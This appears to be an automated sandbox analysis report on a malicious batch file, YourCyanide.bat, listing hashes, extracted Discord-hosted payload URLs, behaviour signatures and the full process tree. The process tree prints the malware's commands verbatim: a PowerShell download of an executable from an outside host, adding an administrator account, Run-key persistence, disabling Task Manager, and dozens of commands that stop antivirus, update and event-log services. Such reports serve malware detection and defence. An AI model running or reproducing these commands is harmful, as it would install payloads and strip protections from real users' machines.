Analysis
-
max time kernel
491s -
max time network
494s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-05-2022 23:26
Static task
static1
Behavioral task
behavioral1
Sample
YourCyanide.bat
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
YourCyanide.bat
Resource
win10v2004-20220414-en
Behavioral task
behavioral3
Sample
YourCyanide.bat
Resource
win11-20220223-en
General
-
Target
YourCyanide.bat
-
Size
150KB
-
MD5
fdd17cbaa7423d1c9ca1ffb376d30b36
-
SHA1
47986c795d7a2521408f4f63a6b068c054659bc7
-
SHA256
6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725
-
SHA512
3aa57c435f462bea43ba87d527603ceabedff24c1353e64dc9b6e2c89956d2216030030e14056095afb4db17eb44f6f33dbed95054d5852cd9a4eccb5d6088cf
Malware Config
Extracted
https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe
Extracted
https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe
Extracted
C:\Users\Admin\Desktop\YcynNote.txt
yourcyanide.help@gmail.com
Signatures
-
suricata: ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 6 4080 powershell.exe 25 1520 powershell.exe 32 1152 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
NoKeyB.exeGetToken.exepid process 4532 NoKeyB.exe 3344 GetToken.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_25967_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.bat" reg.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
cmd.exedescription ioc process File opened (read-only) \??\G: cmd.exe File opened (read-only) \??\I: cmd.exe File opened (read-only) \??\K: cmd.exe File opened (read-only) \??\P: cmd.exe File opened (read-only) \??\R: cmd.exe File opened (read-only) \??\Z: cmd.exe File opened (read-only) \??\A: cmd.exe File opened (read-only) \??\E: cmd.exe File opened (read-only) \??\L: cmd.exe File opened (read-only) \??\M: cmd.exe File opened (read-only) \??\N: cmd.exe File opened (read-only) \??\T: cmd.exe File opened (read-only) \??\U: cmd.exe File opened (read-only) \??\V: cmd.exe File opened (read-only) \??\F: cmd.exe File opened (read-only) \??\J: cmd.exe File opened (read-only) \??\S: cmd.exe File opened (read-only) \??\X: cmd.exe File opened (read-only) \??\B: cmd.exe File opened (read-only) \??\O: cmd.exe File opened (read-only) \??\W: cmd.exe File opened (read-only) \??\Y: cmd.exe File opened (read-only) \??\H: cmd.exe File opened (read-only) \??\Q: cmd.exe -
Drops file in Windows directory 2 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\win.ini cmd.exe File opened for modification C:\Windows\system.ini cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Modifies registry class 21 IoCs
Processes:
powershell.execmd.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings powershell.exe -
NTFS ADS 2 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Users\Admin\Documents\%c¼├XV:~30 cmd.exe File opened for modification C:\Users\Admin\Desktop\%c¼├XV:~23 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4080 powershell.exe 4080 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1868 powershell.exe 1868 powershell.exe 1868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exetasklist.exepowershell.exedescription pid process Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 3700 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeIncreaseQuotaPrivilege 1016 powershell.exe Token: SeSecurityPrivilege 1016 powershell.exe Token: SeTakeOwnershipPrivilege 1016 powershell.exe Token: SeLoadDriverPrivilege 1016 powershell.exe Token: SeSystemProfilePrivilege 1016 powershell.exe Token: SeSystemtimePrivilege 1016 powershell.exe Token: SeProfSingleProcessPrivilege 1016 powershell.exe Token: SeIncBasePriorityPrivilege 1016 powershell.exe Token: SeCreatePagefilePrivilege 1016 powershell.exe Token: SeBackupPrivilege 1016 powershell.exe Token: SeRestorePrivilege 1016 powershell.exe Token: SeShutdownPrivilege 1016 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeSystemEnvironmentPrivilege 1016 powershell.exe Token: SeRemoteShutdownPrivilege 1016 powershell.exe Token: SeUndockPrivilege 1016 powershell.exe Token: SeManageVolumePrivilege 1016 powershell.exe Token: 33 1016 powershell.exe Token: 34 1016 powershell.exe Token: 35 1016 powershell.exe Token: 36 1016 powershell.exe Token: SeShutdownPrivilege 2552 svchost.exe Token: SeCreatePagefilePrivilege 2552 svchost.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeIncreaseQuotaPrivilege 1296 powershell.exe Token: SeSecurityPrivilege 1296 powershell.exe Token: SeTakeOwnershipPrivilege 1296 powershell.exe Token: SeLoadDriverPrivilege 1296 powershell.exe Token: SeSystemProfilePrivilege 1296 powershell.exe Token: SeSystemtimePrivilege 1296 powershell.exe Token: SeProfSingleProcessPrivilege 1296 powershell.exe Token: SeIncBasePriorityPrivilege 1296 powershell.exe Token: SeCreatePagefilePrivilege 1296 powershell.exe Token: SeBackupPrivilege 1296 powershell.exe Token: SeRestorePrivilege 1296 powershell.exe Token: SeShutdownPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeSystemEnvironmentPrivilege 1296 powershell.exe Token: SeRemoteShutdownPrivilege 1296 powershell.exe Token: SeUndockPrivilege 1296 powershell.exe Token: SeManageVolumePrivilege 1296 powershell.exe Token: 33 1296 powershell.exe Token: 34 1296 powershell.exe Token: 35 1296 powershell.exe Token: 36 1296 powershell.exe Token: SeDebugPrivilege 4872 tasklist.exe Token: SeDebugPrivilege 1868 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
NoKeyB.exepid process 4532 NoKeyB.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
NoKeyB.exepid process 4532 NoKeyB.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
NoKeyB.exepowershell.exepid process 4532 NoKeyB.exe 1868 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 4976 wrote to memory of 4936 4976 cmd.exe attrib.exe PID 4976 wrote to memory of 4936 4976 cmd.exe attrib.exe PID 4976 wrote to memory of 4240 4976 cmd.exe rundll32.exe PID 4976 wrote to memory of 4240 4976 cmd.exe rundll32.exe PID 4976 wrote to memory of 4080 4976 cmd.exe powershell.exe PID 4976 wrote to memory of 4080 4976 cmd.exe powershell.exe PID 4976 wrote to memory of 4532 4976 cmd.exe NoKeyB.exe PID 4976 wrote to memory of 4532 4976 cmd.exe NoKeyB.exe PID 4976 wrote to memory of 4708 4976 cmd.exe powershell.exe PID 4976 wrote to memory of 4708 4976 cmd.exe powershell.exe PID 4976 wrote to memory of 836 4976 cmd.exe net.exe PID 4976 wrote to memory of 836 4976 cmd.exe net.exe PID 836 wrote to memory of 4292 836 net.exe net1.exe PID 836 wrote to memory of 4292 836 net.exe net1.exe PID 4976 wrote to memory of 4196 4976 cmd.exe reg.exe PID 4976 wrote to memory of 4196 4976 cmd.exe reg.exe PID 4976 wrote to memory of 4224 4976 cmd.exe reg.exe PID 4976 wrote to memory of 4224 4976 cmd.exe reg.exe PID 4976 wrote to memory of 4268 4976 cmd.exe net.exe PID 4976 wrote to memory of 4268 4976 cmd.exe net.exe PID 4268 wrote to memory of 4176 4268 net.exe net1.exe PID 4268 wrote to memory of 4176 4268 net.exe net1.exe PID 4976 wrote to memory of 1836 4976 cmd.exe net.exe PID 4976 wrote to memory of 1836 4976 cmd.exe net.exe PID 1836 wrote to memory of 1792 1836 net.exe net1.exe PID 1836 wrote to memory of 1792 1836 net.exe net1.exe PID 4976 wrote to memory of 1460 4976 cmd.exe net.exe PID 4976 wrote to memory of 1460 4976 cmd.exe net.exe PID 1460 wrote to memory of 840 1460 net.exe net1.exe PID 1460 wrote to memory of 840 1460 net.exe net1.exe PID 4976 wrote to memory of 2028 4976 cmd.exe net.exe PID 4976 wrote to memory of 2028 4976 cmd.exe net.exe PID 2028 wrote to memory of 2260 2028 net.exe net1.exe PID 2028 wrote to memory of 2260 2028 net.exe net1.exe PID 4976 wrote to memory of 1560 4976 cmd.exe net.exe PID 4976 wrote to memory of 1560 4976 cmd.exe net.exe PID 1560 wrote to memory of 4112 1560 net.exe net1.exe PID 1560 wrote to memory of 4112 1560 net.exe net1.exe PID 4976 wrote to memory of 2096 4976 cmd.exe net.exe PID 4976 wrote to memory of 2096 4976 cmd.exe net.exe PID 2096 wrote to memory of 1552 2096 net.exe net1.exe PID 2096 wrote to memory of 1552 2096 net.exe net1.exe PID 4976 wrote to memory of 2700 4976 cmd.exe net.exe PID 4976 wrote to memory of 2700 4976 cmd.exe net.exe PID 2700 wrote to memory of 2476 2700 net.exe net1.exe PID 2700 wrote to memory of 2476 2700 net.exe net1.exe PID 4976 wrote to memory of 372 4976 cmd.exe net.exe PID 4976 wrote to memory of 372 4976 cmd.exe net.exe PID 372 wrote to memory of 220 372 net.exe net1.exe PID 372 wrote to memory of 220 372 net.exe net1.exe PID 4976 wrote to memory of 1508 4976 cmd.exe net.exe PID 4976 wrote to memory of 1508 4976 cmd.exe net.exe PID 1508 wrote to memory of 1332 1508 net.exe net1.exe PID 1508 wrote to memory of 1332 1508 net.exe net1.exe PID 4976 wrote to memory of 1516 4976 cmd.exe net.exe PID 4976 wrote to memory of 1516 4976 cmd.exe net.exe PID 1516 wrote to memory of 4868 1516 net.exe net1.exe PID 1516 wrote to memory of 4868 1516 net.exe net1.exe PID 4976 wrote to memory of 1020 4976 cmd.exe net.exe PID 4976 wrote to memory of 1020 4976 cmd.exe net.exe PID 1020 wrote to memory of 2340 1020 net.exe net1.exe PID 1020 wrote to memory of 2340 1020 net.exe net1.exe PID 4976 wrote to memory of 4948 4976 cmd.exe net.exe PID 4976 wrote to memory of 4948 4976 cmd.exe net.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat"1⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat2⤵
- Views/modifies file attributes
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\NoKeyB.exeNoKeyB.exe2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_25967_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat /f2⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵
-
C:\Windows\system32\net.exenet stop srservice /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵
-
C:\Windows\system32\net.exenet stop MskService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵
-
C:\Windows\system32\net.exenet stop netsvcs2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵
-
C:\Windows\system32\net.exenet stop spoolnt2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
